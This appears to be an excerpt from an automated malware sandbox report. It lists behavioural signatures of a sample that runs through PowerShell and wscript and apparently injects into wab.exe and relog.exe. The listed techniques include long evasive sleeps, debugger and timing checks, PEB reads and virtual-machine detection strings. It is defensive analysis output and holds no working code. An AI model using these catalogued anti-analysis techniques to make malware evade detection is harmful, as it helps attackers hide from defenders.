Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

17_2_0040DD85

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4966	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4927	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6314	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2804	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 4930	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 1271	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: foregroundWindowGot 1723	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5317
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4265
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6494
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2940
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 486
Source: C:\Windows\SysWOW64\relog.exe	Window / User API: threadDelayed 9903

Found large amount of non-executed APIs

Source: C:\Program Files (x86)\Windows Mail\wab.exe	API coverage: 8.8 %
Source: C:\Program Files (x86)\Windows Mail\wab.exe	API coverage: 9.3 %
Source: C:\Program Files (x86)\Windows Mail\wab.exe	API coverage: 0.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep count: 6314 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep count: 3438 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4320	Thread sleep count: 2804 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856	Thread sleep count: 4930 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856	Thread sleep time: -14790000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856	Thread sleep count: 1271 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856	Thread sleep time: -3813000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048	Thread sleep count: 6494 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4108	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048	Thread sleep count: 2940 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7144	Thread sleep count: 486 > 30
Source: C:\Windows\SysWOW64\relog.exe TID: 8136	Thread sleep count: 9903 > 30
Source: C:\Windows\SysWOW64\relog.exe TID: 8136	Thread sleep time: -19806000s >= -30000s
Source: C:\Windows\SysWOW64\relog.exe TID: 8136	Thread sleep count: 68 > 30
Source: C:\Windows\SysWOW64\relog.exe TID: 8136	Thread sleep time: -136000s >= -30000s
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe TID: 4624	Thread sleep time: -50000s >= -30000s
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe TID: 4624	Thread sleep time: -36000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Thread sleep count: Count: 2804 delay: -5

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_23D710F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,	17_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	18_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	19_2_00407898

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_00418981 memset,GetSystemInfo,

17_2_00418981

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: wab.exe, 0000000A.00000002.4221123486.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(R8)
Source: wscript.exe, 0000000F.00000003.2253570420.0000000004C1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2490651768.0000020B74B9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\relog.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 26_2_21CFD1C0 rdtsc

26_2_21CFD1C0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_045DD6E0 LdrInitializeThunk,

5_2_045DD6E0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_23D72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

10_2_23D72639

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

17_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

17_2_004044A4

Contains functionality to read the PEB

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D74AB4 mov eax, dword ptr fs:[00000030h]	10_2_23D74AB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D461C3 mov eax, dword ptr fs:[00000030h]	26_2_21D461C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D461C3 mov eax, dword ptr fs:[00000030h]	26_2_21D461C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBD1D0 mov eax, dword ptr fs:[00000030h]	26_2_21CBD1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBD1D0 mov ecx, dword ptr fs:[00000030h]	26_2_21CBD1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D551CB mov eax, dword ptr fs:[00000030h]	26_2_21D551CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]	26_2_21CFE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]	26_2_21CFE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFE1D0 mov ecx, dword ptr fs:[00000030h]	26_2_21CFE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]	26_2_21CFE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]	26_2_21CFE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C851ED mov eax, dword ptr fs:[00000030h]	26_2_21C851ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D271F9 mov esi, dword ptr fs:[00000030h]	26_2_21D271F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D561E5 mov eax, dword ptr fs:[00000030h]	26_2_21D561E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB01F8 mov eax, dword ptr fs:[00000030h]	26_2_21CB01F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC0185 mov eax, dword ptr fs:[00000030h]	26_2_21CC0185
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]	26_2_21D0019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]	26_2_21D0019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]	26_2_21D0019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]	26_2_21D0019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A197 mov eax, dword ptr fs:[00000030h]	26_2_21C7A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A197 mov eax, dword ptr fs:[00000030h]	26_2_21C7A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A197 mov eax, dword ptr fs:[00000030h]	26_2_21C7A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3C188 mov eax, dword ptr fs:[00000030h]	26_2_21D3C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3C188 mov eax, dword ptr fs:[00000030h]	26_2_21D3C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD7190 mov eax, dword ptr fs:[00000030h]	26_2_21CD7190
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]	26_2_21D311A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]	26_2_21D311A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]	26_2_21D311A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]	26_2_21D311A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9B1B0 mov eax, dword ptr fs:[00000030h]	26_2_21C9B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55152 mov eax, dword ptr fs:[00000030h]	26_2_21D55152
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D18158 mov eax, dword ptr fs:[00000030h]	26_2_21D18158
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]	26_2_21C79148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]	26_2_21C79148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]	26_2_21C79148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]	26_2_21C79148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7C156 mov eax, dword ptr fs:[00000030h]	26_2_21C7C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C87152 mov eax, dword ptr fs:[00000030h]	26_2_21C87152
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C86154 mov eax, dword ptr fs:[00000030h]	26_2_21C86154
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C86154 mov eax, dword ptr fs:[00000030h]	26_2_21C86154
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D19179 mov eax, dword ptr fs:[00000030h]	26_2_21D19179
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D40115 mov eax, dword ptr fs:[00000030h]	26_2_21D40115
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2A118 mov ecx, dword ptr fs:[00000030h]	26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]	26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]	26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]	26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB0124 mov eax, dword ptr fs:[00000030h]	26_2_21CB0124
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]	26_2_21C7B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]	26_2_21C7B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]	26_2_21C7B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]	26_2_21C7B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D550D9 mov eax, dword ptr fs:[00000030h]	26_2_21D550D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D020DE mov eax, dword ptr fs:[00000030h]	26_2_21D020DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD0C0 mov eax, dword ptr fs:[00000030h]	26_2_21CFD0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD0C0 mov eax, dword ptr fs:[00000030h]	26_2_21CFD0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA90DB mov eax, dword ptr fs:[00000030h]	26_2_21CA90DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C880E9 mov eax, dword ptr fs:[00000030h]	26_2_21C880E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A0E3 mov ecx, dword ptr fs:[00000030h]	26_2_21C7A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA50E4 mov eax, dword ptr fs:[00000030h]	26_2_21CA50E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA50E4 mov ecx, dword ptr fs:[00000030h]	26_2_21CA50E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D060E0 mov eax, dword ptr fs:[00000030h]	26_2_21D060E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7C0F0 mov eax, dword ptr fs:[00000030h]	26_2_21C7C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC20F0 mov ecx, dword ptr fs:[00000030h]	26_2_21CC20F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8208A mov eax, dword ptr fs:[00000030h]	26_2_21C8208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7D08D mov eax, dword ptr fs:[00000030h]	26_2_21C7D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0D080 mov eax, dword ptr fs:[00000030h]	26_2_21D0D080
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0D080 mov eax, dword ptr fs:[00000030h]	26_2_21D0D080
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB909C mov eax, dword ptr fs:[00000030h]	26_2_21CB909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAD090 mov eax, dword ptr fs:[00000030h]	26_2_21CAD090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAD090 mov eax, dword ptr fs:[00000030h]	26_2_21CAD090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C85096 mov eax, dword ptr fs:[00000030h]	26_2_21C85096
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D460B8 mov eax, dword ptr fs:[00000030h]	26_2_21D460B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D460B8 mov ecx, dword ptr fs:[00000030h]	26_2_21D460B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D180A8 mov eax, dword ptr fs:[00000030h]	26_2_21D180A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D06050 mov eax, dword ptr fs:[00000030h]	26_2_21D06050
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C82050 mov eax, dword ptr fs:[00000030h]	26_2_21C82050
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB052 mov eax, dword ptr fs:[00000030h]	26_2_21CAB052
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55060 mov eax, dword ptr fs:[00000030h]	26_2_21D55060
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAC073 mov eax, dword ptr fs:[00000030h]	26_2_21CAC073
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0106E mov eax, dword ptr fs:[00000030h]	26_2_21D0106E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD070 mov ecx, dword ptr fs:[00000030h]	26_2_21CFD070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]	26_2_21C9E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]	26_2_21C9E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]	26_2_21C9E016
